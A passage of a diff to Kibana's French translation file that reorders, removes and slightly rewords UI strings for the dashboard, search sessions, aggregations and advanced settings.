?", "dashboard.appLeaveConfirmModal.unsavedChangesTitle": "Modifications non enregistrées", "dashboard.badge.readOnly.text": "Lecture seule", "dashboard.badge.readOnly.tooltip": "Impossible d'enregistrer les tableaux de bord", @@ -1869,12 +953,11 @@ "dashboard.dashboardAppBreadcrumbsTitle": "Tableau de bord", "dashboard.dashboardGrid.toast.unableToLoadDashboardDangerMessage": "Impossible de charger le tableau de bord.", "dashboard.dashboardPageTitle": "Tableaux de bord", - "dashboard.dashboardWasNotSavedDangerMessage": "Le tableau de bord \"{dashTitle}\" n'a pas été enregistré. Erreur : {errorMessage}", "dashboard.dashboardWasSavedSuccessMessage": "Le tableau de bord \"{dashTitle}\" a été enregistré.", "dashboard.discardChangesConfirmModal.cancelButtonLabel": "Annuler", "dashboard.discardChangesConfirmModal.confirmButtonLabel": "Ignorer les modifications", "dashboard.discardChangesConfirmModal.discardChangesDescription": "Une fois les modifications ignorées, vous ne pourrez pas les récupérer.", - "dashboard.discardChangesConfirmModal.discardChangesTitle": "Ignorer les modifications apportées au tableau de bord ?", + "dashboard.discardChangesConfirmModal.discardChangesTitle": "Ignorer les modifications apportées au tableau de bord ?", "dashboard.editorMenu.aggBasedGroupTitle": "Basé sur une agrégation", "dashboard.editorMenu.deprecatedTag": "Déclassé", "dashboard.embedUrlParamExtension.filterBar": "Barre de filtre", @@ -1899,7 +982,6 @@ "dashboard.listing.createNewDashboard.combineDataViewFromKibanaAppDescription": "Analysez toutes vos données Elastic en un seul endroit, en créant un tableau de bord et en ajoutant des visualisations.", "dashboard.listing.createNewDashboard.createButtonLabel": "Créer un tableau de bord", "dashboard.listing.createNewDashboard.inProgressTitle": "Tableau de bord en cours", - "dashboard.listing.createNewDashboard.newToKibanaDescription": "Vous êtes nouveau sur Kibana ? {sampleDataInstallLink} pour découvrir l'application.", "dashboard.listing.createNewDashboard.sampleDataInstallLinkText": "Ajoutez des exemples de données", "dashboard.listing.createNewDashboard.title": "Créer votre premier tableau de bord", "dashboard.listing.readonlyNoItemsBody": "Aucun tableau de bord n'est disponible. Pour modifier vos autorisations afin d’afficher les tableaux de bord dans cet espace, contactez votre administrateur.", @@ -1908,18 +990,12 @@ "dashboard.listing.table.entityName": "tableau de bord", "dashboard.listing.table.entityNamePlural": "tableaux de bord", "dashboard.listing.table.titleColumnName": "Titre", - "dashboard.listing.unsaved.discardAria": "Ignorer les modifications apportées à {title}", - "dashboard.listing.unsaved.discardTitle": "Ignorer les modifications", - "dashboard.listing.unsaved.editAria": "Poursuivre les modifications apportées à {title}", + "dashboard.listing.unsaved.discardTitle": "Abandonner les modifications", "dashboard.listing.unsaved.editTitle": "Poursuivre les modifications", "dashboard.listing.unsaved.loading": "Chargement", - "dashboard.listing.unsaved.unsavedChangesTitle": "Vous avez des modifications non enregistrées dans le {dash} suivant :", - "dashboard.loadingError.errorMessage": "Erreur rencontrée lors du chargement du tableau de bord enregistré : {message}", "dashboard.migratedChanges": "Certains des panneaux ont été mis à jour vers la version la plus récente.", - "dashboard.noMatchRoute.bannerText": "L'application de tableau de bord ne reconnaît pas ce chemin : {route}.", "dashboard.noMatchRoute.bannerTitleText": "Page introuvable", "dashboard.panel.AddToLibrary": "Enregistrer dans la bibliothèque", - "dashboard.panel.addToLibrary.successMessage": "Le panneau {panelTitle} a été ajouté à la bibliothèque Visualize.", "dashboard.panel.clonedToast": "Panneau cloné", "dashboard.panel.clonePanel": "Cloner le panneau", "dashboard.panel.copyToDashboard.cancel": "Annuler", @@ -1935,24 +1011,15 @@ "dashboard.panel.removePanel.replacePanel": "Remplacer le panneau", "dashboard.panel.title.clonedTag": "copier", "dashboard.panel.unableToMigratePanelDataForSixOneZeroErrorMessage": "Impossible de migrer les données du panneau pour une rétro-compatibilité \"6.1.0\". Le panneau ne contient pas les champs de colonne et/ou de ligne attendus.", - "dashboard.panel.unableToMigratePanelDataForSixThreeZeroErrorMessage": "Impossible de migrer les données du panneau pour une rétro-compatibilité \"6.3.0\". Le panneau ne contient pas le champ attendu : {key}.", "dashboard.panel.unlinkFromLibrary": "Dissocier de la bibliothèque", - "dashboard.panel.unlinkFromLibrary.successMessage": "Le panneau {panelTitle} n'est plus connecté à la bibliothèque Visualize.", - "dashboard.panelStorageError.clearError": "Une erreur s'est produite lors de la suppression des modifications non enregistrées : {message}.", - "dashboard.panelStorageError.getError": "Une erreur s'est produite lors de la récupération des modifications non enregistrées : {message}.", - "dashboard.panelStorageError.setError": "Une erreur s'est produite lors de la définition des modifications non enregistrées : {message}.", "dashboard.placeholder.factory.displayName": "paramètre fictif", "dashboard.savedDashboard.newDashboardTitle": "Nouveau tableau de bord", - "dashboard.share.defaultDashboardTitle": "Tableau de bord [{date}]", "dashboard.solutionToolbar.addPanelButtonLabel": "Créer une visualisation", "dashboard.solutionToolbar.editorMenuButtonLabel": "Sélectionner un type", - "dashboard.strings.dashboardEditTitle": "Modification de {title}", "dashboard.topNav.cloneModal.cancelButtonLabel": "Annuler", "dashboard.topNav.cloneModal.cloneDashboardModalHeaderTitle": "Cloner le tableau de bord", "dashboard.topNav.cloneModal.confirmButtonLabel": "Confirmer le clonage", "dashboard.topNav.cloneModal.confirmCloneDescription": "Confirmer le clonage", - "dashboard.topNav.cloneModal.dashboardExistsDescription": "Cliquez sur {confirmClone} pour cloner le tableau de bord avec le titre dupliqué.", - "dashboard.topNav.cloneModal.dashboardExistsTitle": "Un tableau de bord nommé {newDashboardName} existe déjà.", "dashboard.topNav.cloneModal.enterNewNameForDashboardDescription": "Veuillez saisir un autre nom pour votre tableau de bord.", "dashboard.topNav.labsButtonAriaLabel": "ateliers", "dashboard.topNav.labsConfigDescription": "Ateliers", @@ -1964,7 +1031,6 @@ "dashboard.topNav.saveModal.objectType": "tableau de bord", "dashboard.topNav.saveModal.storeTimeWithDashboardFormRowHelpText": "Le filtre temporel est défini sur l’option sélectionnée chaque fois que ce tableau de bord est chargé.", "dashboard.topNav.saveModal.storeTimeWithDashboardFormRowLabel": "Enregistrer la plage temporelle avec le tableau de bord", - "dashboard.topNav.showCloneModal.dashboardCopyTitle": "Copie de {title}", "dashboard.topNave.cancelButtonAriaLabel": "Basculer en mode Affichage", "dashboard.topNave.cloneButtonAriaLabel": "cloner", "dashboard.topNave.cloneConfigDescription": "Créer une copie du tableau de bord", @@ -1982,24 +1048,100 @@ "dashboard.topNave.shareConfigDescription": "Partager le tableau de bord", "dashboard.topNave.viewConfigDescription": "Basculer en mode Affichage uniquement", "dashboard.unsavedChangesBadge": "Modifications non enregistrées", - "dashboard.urlWasRemovedInSixZeroWarningMessage": "L'url \"dashboard/create\" a été supprimée dans la version 6.0. Veuillez mettre vos signets à jour.", - "data.advancedSettings.autocompleteIgnoreTimerange": "Utiliser la plage temporelle", + "dashboard.urlWasRemovedInSixZeroWarningMessage": "L'url \"dashboard/create\" a été supprimée dans la version 6.0. Veuillez mettre vos signets à jour.", "data.advancedSettings.autocompleteIgnoreTimerangeText": "Désactivez cette propriété pour obtenir des suggestions de saisie semi-automatique depuis l’intégralité de l’ensemble de données plutôt que depuis la plage temporelle définie. {learnMoreLink}", + "data.advancedSettings.autocompleteValueSuggestionMethodText": "La méthode utilisée pour générer des suggestions de valeur pour la saisie semi-automatique KQL. Sélectionnez terms_enum pour utiliser l'API d'énumération de termes d'Elasticsearch afin d’améliorer les performances de suggestion de saisie semi-automatique. Sélectionnez terms_agg pour utiliser l'agrégation de termes d'Elasticsearch. {learnMoreLink}", + "data.advancedSettings.courier.customRequestPreferenceText": "{requestPreferenceLink} utilisé lorsque {setRequestReferenceSetting} est défini sur {customSettingValue}.", + "data.advancedSettings.courier.maxRequestsText": "Contrôle le paramètre {maxRequestsLink} utilisé pour les requêtes _msearch envoyées par Kibana. Définir ce paramètre sur 0 permet d’utiliser la valeur Elasticsearch par défaut.", + "data.advancedSettings.query.allowWildcardsText": "Lorsque ce paramètre est activé, le caractère \"*\" est autorisé en tant que premier caractère dans une clause de requête. Ne s'applique actuellement que lorsque les fonctionnalités de requête expérimentales sont activées dans la barre de requête. Pour ne plus autoriser l’utilisation de caractères génériques au début des requêtes Lucene de base, utilisez {queryStringOptionsPattern}.", + "data.advancedSettings.query.queryStringOptionsText": "{optionsLink} pour l'analyseur de chaînes de requête Lucene. Uniquement utilisé lorsque \"{queryLanguage}\" est défini sur {luceneLanguage}.", + "data.advancedSettings.sortOptionsText": "{optionsLink} pour le paramètre de tri Elasticsearch", + "data.advancedSettings.timepicker.quickRangesText": "La liste des plages à afficher dans la section rapide du filtre temporel. Il s’agit d’un tableau d'objets, avec chaque objet contenant \"de\", \"à\" (voir {acceptedFormatsLink}) et \"afficher\" (le titre à afficher).", + "data.aggTypes.buckets.ranges.rangesFormatMessage": "{gte} {from} et {lt} {to}", + "data.aggTypes.buckets.ranges.rangesFormatMessageArrowRight": "{from} → {to}", + "data.filter.filterBar.fieldNotFound": "Champ {key} non trouvé dans la vue de données {dataView}", + "data.inspector.table.tableLabel": "Tableau {index}", + "data.inspector.table.tablesDescription": "Il y a {tablesCount, plural, one {# tableau} other {# tableaux} } au total.", + "data.mgmt.searchSessions.api.fetchTimeout": "La récupération des informations de la session de recherche a expiré après {timeout} secondes", + "data.mgmt.searchSessions.extendModal.extendMessage": "L'expiration de la session de recherche \"{name}\" sera étendue jusqu'à {newExpires}.", + "data.mgmt.searchSessions.status.expiresOn": "Expire le {expireDate}", + "data.mgmt.searchSessions.status.expiresSoonInDays": "Expire dans {numDays} jours", + "data.mgmt.searchSessions.status.expiresSoonInDaysTooltip": "{numDays} jours", + "data.mgmt.searchSessions.status.expiresSoonInHours": "Cette session expire dans {numHours} heures", + "data.mgmt.searchSessions.status.expiresSoonInHoursTooltip": "{numHours} heures", + "data.mgmt.searchSessions.status.message.createdOn": "Expire le {expireDate}", + "data.mgmt.searchSessions.status.message.error": "Erreur : {error}", + "data.mgmt.searchSessions.status.message.expiredOn": "Expiré le {expireDate}", + "data.painlessError.painlessScriptedFieldErrorMessage": "Erreur d'exécution du champ d'exécution ou du champ scripté sur le modèle d'indexation {indexPatternName}", + "data.parseEsInterval.invalidEsCalendarIntervalErrorMessage": "Intervalle de calendrier non valide : {interval} ; la valeur doit être 1.", + "data.parseEsInterval.invalidEsIntervalFormatErrorMessage": "Format d'intervalle non valide : {interval}", + "data.search.aggs.aggTypesLabel": "plages {fieldName}", + "data.search.aggs.buckets.dateHistogramLabel": "{fieldName} par {intervalDescription}", + "data.search.aggs.buckets.ipRangeLabel": "Plages d'IP de {fieldName}", + "data.search.aggs.buckets.significantTermsLabel": "Top {size} des termes les plus inhabituels pour {fieldName}", + "data.search.aggs.buckets.significantTextLabel": "Top {size} des termes les plus inhabituels pour \"{fieldName}\"", + "data.search.aggs.error.aggNotFound": "Aucun type d'agrégation enregistré pour \"{type}\".", + "data.search.aggs.metrics.averageLabel": "Moyenne {field}", + "data.search.aggs.metrics.maxLabel": "Max. {field}", + "data.search.aggs.metrics.medianLabel": "Médiane {field}", + "data.search.aggs.metrics.minLabel": "Min. {field}", + "data.search.aggs.metrics.percentileRanks.valuePropsLabel": "Rang centile {format} de \"{label}\"", + "data.search.aggs.metrics.percentileRanksLabel": "Rangs centiles de {field}", + "data.search.aggs.metrics.percentiles.valuePropsLabel": "{percentile} centile de {label}", + "data.search.aggs.metrics.percentilesLabel": "Centiles de {field}", + "data.search.aggs.metrics.singlePercentileLabel": "Centile {field}", + "data.search.aggs.metrics.singlePercentileRankLabel": "Rang centile de {field}", + "data.search.aggs.metrics.standardDeviation.keyDetailsLabel": "Écart-type de {fieldDisplayName}", + "data.search.aggs.metrics.standardDeviation.lowerKeyDetailsTitle": "{label} inférieur", + "data.search.aggs.metrics.standardDeviation.upperKeyDetailsTitle": "{label} supérieur", + "data.search.aggs.metrics.standardDeviationLabel": "Écart-type de {field}", + "data.search.aggs.metrics.sumLabel": "Somme de {field}", + "data.search.aggs.metrics.topMetrics.ascNoSizeLabel": "Première valeur \"{fieldName}\" par \"{sortField}\"", + "data.search.aggs.metrics.topMetrics.ascWithSizeLabel": "{size} premières valeurs \"{fieldName}\" par \"{sortField}\"", + "data.search.aggs.metrics.topMetrics.descNoSizeLabel": "Dernière valeur \"{fieldName}\" par \"{sortField}\"", + "data.search.aggs.metrics.topMetrics.descWithSizeLabel": "{size} dernières valeurs \"{fieldName}\" par \"{sortField}\"", + "data.search.aggs.metrics.uniqueCountLabel": "Décompte unique de {field}", + "data.search.aggs.metrics.valueCountLabel": "Décompte de la valeur de {field}", + "data.search.aggs.paramTypes.field.invalidSavedFieldParameterErrorMessage": "Le champ enregistré \"{fieldParameter}\" de la vue de données \"{indexPatternTitle}\" n'est pas valide pour une utilisation avec l'agrégation \"{aggType}\". Veuillez sélectionner un nouveau champ.", + "data.search.aggs.paramTypes.field.notFoundSavedFieldParameterErrorMessage": "Le champ \"{fieldParameter}\" associé à cet objet n'existe plus dans la vue de données. Veuillez utiliser un autre champ.", + "data.search.aggs.paramTypes.field.requiredFieldParameterErrorMessage": "{fieldParameter} est un paramètre requis.", + "data.search.aggs.percentageOfLabel": "Pourcentage de {label}", + "data.search.aggs.rareTerms.aggTypesLabel": "Termes rares de {fieldName}", + "data.search.es_search.queryTimeValue": "{queryTime} ms", + "data.search.functions.geoBoundingBox.arguments.error": "Au moins un des groupes de paramètres suivants doit être fourni : {parameters}.", + "data.search.searchSource.fetch.shardsFailedModal.failureHeader": "{failureName} à {failureDetails}", + "data.search.searchSource.fetch.shardsFailedModal.tableRowCollapse": "Réduire {rowDescription}", + "data.search.searchSource.fetch.shardsFailedModal.tableRowExpand": "Développer {rowDescription}", + "data.search.searchSource.fetch.shardsFailedNotificationMessage": "Échec de {shardsFailed} partitions sur {shardsTotal}", + "data.search.searchSource.indexPatternIdDescription": "L'ID dans l'index {kibanaIndexPattern}.", + "data.search.searchSource.queryTimeValue": "{queryTime} ms", + "data.search.searchSource.requestTimeValue": "{requestTime} ms", + "data.search.statusError": "Recherche terminée avec un statut {errorCode}", + "data.search.statusThrow": "Le statut de la recherche a généré un statut d'erreur {message} ({errorCode})", + "data.search.timeBuckets.dayLabel": "{amount, plural, one {un jour} other {# jours}}", + "data.search.timeBuckets.hourLabel": "{amount, plural, one {une heure} other {# heures}}", + "data.search.timeBuckets.millisecondLabel": "{amount, plural, one {une milliseconde} other {# millisecondes}}", + "data.search.timeBuckets.minuteLabel": "{amount, plural, one {une minute} other {# minutes}}", + "data.search.timeBuckets.secondLabel": "{amount, plural, one {une seconde} other {# secondes}}", + "data.searchSessionIndicator.canceledWhenText": "Arrêtée {when}", + "data.searchSessionIndicator.loadingInTheBackgroundWhenText": "Débuté {when}", + "data.searchSessionIndicator.loadingResultsWhenText": "Débuté {when}", + "data.searchSessionIndicator.restoredWhenText": "Terminé {when}", + "data.searchSessionIndicator.resultLoadedInTheBackgroundWhenText": "Terminé {when}", + "data.searchSessionIndicator.resultsLoadedWhenText": "Terminé {when}", + "data.advancedSettings.autocompleteIgnoreTimerange": "Utiliser la plage temporelle", "data.advancedSettings.autocompleteValueSuggestionMethod": "Méthode de suggestion de saisie semi-automatique", "data.advancedSettings.autocompleteValueSuggestionMethodLearnMoreLink": "En savoir plus.", "data.advancedSettings.autocompleteValueSuggestionMethodLink": "En savoir plus.", - "data.advancedSettings.autocompleteValueSuggestionMethodText": "La méthode utilisée pour générer des suggestions de valeur pour la saisie semi-automatique KQL. Sélectionnez terms_enum pour utiliser l'API d'énumération de termes d'Elasticsearch afin d’améliorer les performances de suggestion de saisie semi-automatique. Sélectionnez terms_agg pour utiliser l'agrégation de termes d'Elasticsearch. {learnMoreLink}", "data.advancedSettings.courier.customRequestPreference.requestPreferenceLinkText": "Préférence de requête", - "data.advancedSettings.courier.customRequestPreferenceText": "{requestPreferenceLink} utilisé lorsque {setRequestReferenceSetting} est défini sur {customSettingValue}.", "data.advancedSettings.courier.customRequestPreferenceTitle": "Préférence de requête personnalisée", "data.advancedSettings.courier.ignoreFilterText": "Cette configuration améliore la prise en charge des tableaux de bord contenant des visualisations accédant à des index différents. Lorsque ce paramètre est désactivé, tous les filtres sont appliqués à toutes les visualisations. En cas d'activation, le ou les filtres sont ignorés pour une visualisation lorsque l'index de celle-ci ne contient pas le champ de filtrage.", "data.advancedSettings.courier.ignoreFilterTitle": "Ignorer le ou les filtres", - "data.advancedSettings.courier.maxRequestsText": "Contrôle le paramètre {maxRequestsLink} utilisé pour les requêtes _msearch envoyées par Kibana. Définir ce paramètre sur 0 permet d’utiliser la valeur Elasticsearch par défaut.", "data.advancedSettings.courier.maxRequestsTitle": "Requêtes de partitions simultanées max.", "data.advancedSettings.courier.requestPreferenceCustom": "Personnalisée", "data.advancedSettings.courier.requestPreferenceNone": "Aucune", "data.advancedSettings.courier.requestPreferenceSessionId": "ID session", - "data.advancedSettings.courier.requestPreferenceText": "Permet de définir quelles partitions doivent gérer les requêtes de recherche.\n
    \n
  • {sessionId} : limite les opérations pour exécuter toutes les requêtes de recherche sur les mêmes partitions.\n Cela a l'avantage de réutiliser les caches de partition pour toutes les requêtes.
    • \n
  • {custom} : permet de définir une valeur de préférence.\n Utilisez \"courier:customRequestPreference\" pour personnaliser votre valeur de préférence.
    • \n
  • {none} : permet de ne pas définir de préférence.\n Cela peut permettre de meilleures performances, car les requêtes peuvent être réparties entre toutes les copies de partition.\n Cependant, les résultats peuvent être incohérents, les différentes partitions pouvant se trouver dans différents états d'actualisation.
    • \n
", + "data.advancedSettings.courier.requestPreferenceText": "Permet de définir quelles partitions doivent gérer les requêtes de recherche.\n
    \n
  • {sessionId} : limite les opérations pour exécuter toutes les requêtes de recherche sur les mêmes partitions.\n Cela a l'avantage de réutiliser les caches de partition pour toutes les requêtes.
    • \n
  • {custom} : permet de définir une valeur de préférence.\n Utilisez \"courier:customRequestPreference\" pour personnaliser votre valeur de préférence.
    • \n
  • {none} : permet de ne pas définir de préférence.\n Cela peut permettre de meilleures performances, car les requêtes peuvent être réparties entre toutes les copies de partition.\n Cependant, les résultats peuvent être incohérents, les différentes partitions pouvant se trouver dans différents états d'actualisation.
    • \n
", "data.advancedSettings.courier.requestPreferenceTitle": "Préférence de requête", "data.advancedSettings.defaultIndexText": "L’index utilisé en l’absence de spécification.", "data.advancedSettings.defaultIndexTitle": "Index par défaut", @@ -2015,33 +1157,29 @@ "data.advancedSettings.metaFieldsTitle": "Champs méta", "data.advancedSettings.pinFiltersText": "Détermine si les filtres doivent avoir un certain état global (être épinglés) par défaut.", "data.advancedSettings.pinFiltersTitle": "Épingler les filtres par défaut", - "data.advancedSettings.query.allowWildcardsText": "Lorsque ce paramètre est activé, le caractère \"*\" est autorisé en tant que premier caractère dans une clause de requête. Ne s'applique actuellement que lorsque les fonctionnalités de requête expérimentales sont activées dans la barre de requête. Pour ne plus autoriser l’utilisation de caractères génériques au début des requêtes Lucene de base, utilisez {queryStringOptionsPattern}.", "data.advancedSettings.query.allowWildcardsTitle": "Autoriser les caractères génériques au début des requêtes", "data.advancedSettings.query.queryStringOptions.optionsLinkText": "Options", - "data.advancedSettings.query.queryStringOptionsText": "{optionsLink} pour l'analyseur de chaînes de requête Lucene. Uniquement utilisé lorsque \"{queryLanguage}\" est défini sur {luceneLanguage}.", "data.advancedSettings.query.queryStringOptionsTitle": "Options de chaîne de requête", - "data.advancedSettings.search.includeFrozenTextDeprecation": "Ce paramètre est déclassé et sera supprimé dans la version 9.0 de Kibana.", + "data.advancedSettings.search.includeFrozenTextDeprecation": "Ce paramètre est déclassé et sera supprimé dans la version 9.0 de Kibana.", "data.advancedSettings.searchQueryLanguageKql": "KQL", "data.advancedSettings.searchQueryLanguageLucene": "Lucene", "data.advancedSettings.searchQueryLanguageText": "Le langage de requête utilisé par la barre de requête. KQL est un nouveau langage spécialement conçu pour Kibana.", "data.advancedSettings.searchQueryLanguageTitle": "Langage de requête", "data.advancedSettings.searchTimeout": "Délai d'expiration de la recherche", - "data.advancedSettings.searchTimeoutDesc": "Permet de définir le délai d'expiration maximal pour une session de recherche. La valeur 0 permet de désactiver le délai d’expiration afin que les requêtes soient exécutées jusqu'au bout.", + "data.advancedSettings.searchTimeoutDesc": "Permet de définir le délai d'expiration maximal pour une session de recherche. La valeur 0 permet de désactiver le délai d’expiration afin que les requêtes soient exécutées jusqu'au bout.", "data.advancedSettings.sortOptions.optionsLinkText": "Options", - "data.advancedSettings.sortOptionsText": "{optionsLink} pour le paramètre de tri Elasticsearch", "data.advancedSettings.sortOptionsTitle": "Options de tri", "data.advancedSettings.suggestFilterValuesText": "Définir cette propriété sur \"faux\" permet d’empêcher l'éditeur de filtres de suggérer des valeurs pour les champs.", "data.advancedSettings.suggestFilterValuesTitle": "Suggestions de l'éditeur de filtres", - "data.advancedSettings.timepicker.last15Minutes": "Dernières 15 minutes", + "data.advancedSettings.timepicker.last15Minutes": "Dernières 15 minutes", "data.advancedSettings.timepicker.last1Hour": "Dernière heure", "data.advancedSettings.timepicker.last1Year": "Dernière année", - "data.advancedSettings.timepicker.last24Hours": "Dernières 24 heures", - "data.advancedSettings.timepicker.last30Days": "30 derniers jours", - "data.advancedSettings.timepicker.last30Minutes": "30 dernières minutes", - "data.advancedSettings.timepicker.last7Days": "7 derniers jours", - "data.advancedSettings.timepicker.last90Days": "90 derniers jours", + "data.advancedSettings.timepicker.last24Hours": "Dernières 24 heures", + "data.advancedSettings.timepicker.last30Days": "30 derniers jours", + "data.advancedSettings.timepicker.last30Minutes": "30 dernières minutes", + "data.advancedSettings.timepicker.last7Days": "7 derniers jours", + "data.advancedSettings.timepicker.last90Days": "90 derniers jours", "data.advancedSettings.timepicker.quickRanges.acceptedFormatsLinkText": "formats acceptés", - "data.advancedSettings.timepicker.quickRangesText": "La liste des plages à afficher dans la section rapide du filtre temporel. Il s’agit d’un tableau d'objets, avec chaque objet contenant \"de\", \"à\" (voir {acceptedFormatsLink}) et \"afficher\" (le titre à afficher).", "data.advancedSettings.timepicker.quickRangesTitle": "Plages rapides du filtre temporel", "data.advancedSettings.timepicker.refreshIntervalDefaultsText": "L'intervalle d'actualisation par défaut du filtre temporel. La valeur doit être spécifiée en millisecondes.", "data.advancedSettings.timepicker.refreshIntervalDefaultsTitle": "Intervalle d'actualisation du filtre temporel", @@ -2049,11 +1187,8 @@ "data.advancedSettings.timepicker.timeDefaultsText": "L’option de filtre temporel à utiliser lorsque Kibana est démarré sans filtre", "data.advancedSettings.timepicker.timeDefaultsTitle": "Filtre temporel par défaut", "data.advancedSettings.timepicker.today": "Aujourd'hui", - "data.aggTypes.buckets.ranges.rangesFormatMessage": "{gte} {from} et {lt} {to}", - "data.aggTypes.buckets.ranges.rangesFormatMessageArrowRight": "{from} → {to}", "data.errors.fetchError": "Vérifiez votre réseau et la configuration de votre proxy. Si le problème persiste, contactez votre administrateur réseau.", "data.esError.unknownRootCause": "inconnue", - "data.filter.filterBar.fieldNotFound": "Champ {key} non trouvé dans la vue de données {dataView}", "data.functions.esaggs.help": "Exécuter l'agrégation AggConfig", "data.functions.esaggs.inspector.dataRequest.description": "Cette requête interroge Elasticsearch pour récupérer les données pour la visualisation.", "data.functions.esaggs.inspector.dataRequest.title": "Données", @@ -2061,7 +1196,7 @@ "data.inspector.table.dataTitle": "Données", "data.inspector.table.downloadCSVToggleButtonLabel": "Télécharger CSV", "data.inspector.table.downloadOptionsUnsavedFilename": "non enregistré", - "data.inspector.table.exportButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.", + "data.inspector.table.exportButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.", "data.inspector.table.filterForValueButtonAriaLabel": "Filtrer sur la valeur", "data.inspector.table.filterForValueButtonTooltip": "Filtrer sur la valeur", "data.inspector.table.filterOutValueButtonAriaLabel": "Exclure la valeur", @@ -2072,19 +1207,16 @@ "data.inspector.table.noDataAvailableTitle": "Aucune donnée disponible", "data.inspector.table.rawCSVButtonLabel": "CSV brut", "data.inspector.table.rawCSVButtonTooltip": "Télécharger les données telles que fournies, par exemple, les dates sous forme d'horodatages", - "data.inspector.table.tableLabel": "Tableau {index}", - "data.inspector.table.tablesDescription": "Il y a {tablesCount, plural, one {# tableau} other {# tableaux} } au total.", - "data.inspector.table.tableSelectorLabel": "Sélectionné :", + "data.inspector.table.tableSelectorLabel": "Sélectionné :", "data.mgmt.searchSessions.actionDelete": "Supprimer", "data.mgmt.searchSessions.actionExtend": "Étendre", "data.mgmt.searchSessions.actionRename": "Modifier le nom", "data.mgmt.searchSessions.actions.tooltip.moreActions": "Plus d'actions", "data.mgmt.searchSessions.api.deleted": "La session de recherche a été supprimée.", - "data.mgmt.searchSessions.api.deletedError": "Impossible de supprimer la session de recherche !", + "data.mgmt.searchSessions.api.deletedError": "Impossible de supprimer la session de recherche !", "data.mgmt.searchSessions.api.extended": "La session de recherche a été étendue.", - "data.mgmt.searchSessions.api.extendError": "Impossible d'étendre la session de recherche !", - "data.mgmt.searchSessions.api.fetchError": "Impossible d'actualiser la page !", - "data.mgmt.searchSessions.api.fetchTimeout": "La récupération des informations de la session de recherche a expiré après {timeout} secondes", + "data.mgmt.searchSessions.api.extendError": "Impossible d'étendre la session de recherche !", + "data.mgmt.searchSessions.api.fetchError": "Impossible d'actualiser la page !", "data.mgmt.searchSessions.api.rename": "La session de recherche a été renommée", "data.mgmt.searchSessions.api.renameError": "Impossible de renommer la session de recherche", "data.mgmt.searchSessions.appTitle": "Sessions de recherche", @@ -2095,7 +1227,6 @@ "data.mgmt.searchSessions.cancelModal.title": "Supprimer la session de recherche", "data.mgmt.searchSessions.extendModal.dontExtendButton": "Annuler", "data.mgmt.searchSessions.extendModal.extendButton": "Étendre l'expiration", - "data.mgmt.searchSessions.extendModal.extendMessage": "L'expiration de la session de recherche \"{name}\" sera étendue jusqu'à {newExpires}.", "data.mgmt.searchSessions.extendModal.title": "Étendre l'expiration de la session de recherche", "data.mgmt.searchSessions.flyoutTitle": "Inspecter", "data.mgmt.searchSessions.main.backgroundSessionsDocsLinkText": "Documentation", @@ -2108,21 +1239,13 @@ "data.mgmt.searchSessions.search.filterApp": "Application", "data.mgmt.searchSessions.search.filterStatus": "Statut", "data.mgmt.searchSessions.search.tools.refresh": "Actualiser", - "data.mgmt.searchSessions.status.expireDateUnknown": "inconnu", - "data.mgmt.searchSessions.status.expiresOn": "Expire le {expireDate}", - "data.mgmt.searchSessions.status.expiresSoonInDays": "Expire dans {numDays} jours", - "data.mgmt.searchSessions.status.expiresSoonInDaysTooltip": "{numDays} jours", - "data.mgmt.searchSessions.status.expiresSoonInHours": "Cette session expire dans {numHours} heures", - "data.mgmt.searchSessions.status.expiresSoonInHoursTooltip": "{numHours} heures", + "data.mgmt.searchSessions.status.expireDateUnknown": "inconnue", "data.mgmt.searchSessions.status.label.cancelled": "Annulé", "data.mgmt.searchSessions.status.label.complete": "Terminé", "data.mgmt.searchSessions.status.label.error": "Erreur", "data.mgmt.searchSessions.status.label.expired": "Expiré", "data.mgmt.searchSessions.status.label.inProgress": "En cours", "data.mgmt.searchSessions.status.message.cancelled": "Annulé par l'utilisateur", - "data.mgmt.searchSessions.status.message.createdOn": "Expire le {expireDate}", - "data.mgmt.searchSessions.status.message.error": "Erreur : {error}", - "data.mgmt.searchSessions.status.message.expiredOn": "Expiré le {expireDate}", "data.mgmt.searchSessions.table.headerExpiration": "Expiration", "data.mgmt.searchSessions.table.headerName": "Nom", "data.mgmt.searchSessions.table.headerStarted": "Créé", @@ -2133,13 +1256,9 @@ "data.mgmt.searchSessions.table.numSearches": "# recherches", "data.mgmt.searchSessions.table.versionIncompatibleWarning": "Cette session de recherche a été créée dans une instance Kibana exécutant une version différente. Il se peut qu'elle ne soit pas correctement restaurée.", "data.painlessError.buttonTxt": "Modifier le script", - "data.painlessError.painlessScriptedFieldErrorMessage": "Erreur d'exécution du champ d'exécution ou du champ scripté sur le modèle d'indexation {indexPatternName}", - "data.parseEsInterval.invalidEsCalendarIntervalErrorMessage": "Intervalle de calendrier non valide : {interval} ; la valeur doit être 1.", - "data.parseEsInterval.invalidEsIntervalFormatErrorMessage": "Format d'intervalle non valide : {interval}", "data.search.aggs.aggGroups.bucketsText": "Compartiments", "data.search.aggs.aggGroups.metricsText": "Indicateurs", - "data.search.aggs.aggGroups.noneText": "Aucune", - "data.search.aggs.aggTypesLabel": "plages {fieldName}", + "data.search.aggs.aggGroups.noneText": "Aucun", "data.search.aggs.buckets.dateHistogram.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.dateHistogram.dropPartials.help": "Spécifie l'utilisation ou non de drop_partials pour cette agrégation.", "data.search.aggs.buckets.dateHistogram.enabled.help": "Spécifie si cette agrégation doit être activée.", @@ -2156,7 +1275,6 @@ "data.search.aggs.buckets.dateHistogram.timeRange.help": "Plage temporelle à utiliser pour cette agrégation", "data.search.aggs.buckets.dateHistogram.timeZone.help": "Fuseau horaire à utiliser pour cette agrégation", "data.search.aggs.buckets.dateHistogram.useNormalizedEsInterval.help": "Spécifie l'utilisation ou non de useNormalizedEsInterval pour cette agrégation.", - "data.search.aggs.buckets.dateHistogramLabel": "{fieldName} par {intervalDescription}", "data.search.aggs.buckets.dateHistogramTitle": "Histogramme de date", "data.search.aggs.buckets.dateRange.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.dateRange.enabled.help": "Spécifie si cette agrégation doit être activée.", @@ -2176,7 +1294,7 @@ "data.search.aggs.buckets.diversifiedSamplerTitle": "Échantillonneur diversifié", "data.search.aggs.buckets.filter.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.filter.enabled.help": "Spécifie si cette agrégation doit être activée.", - 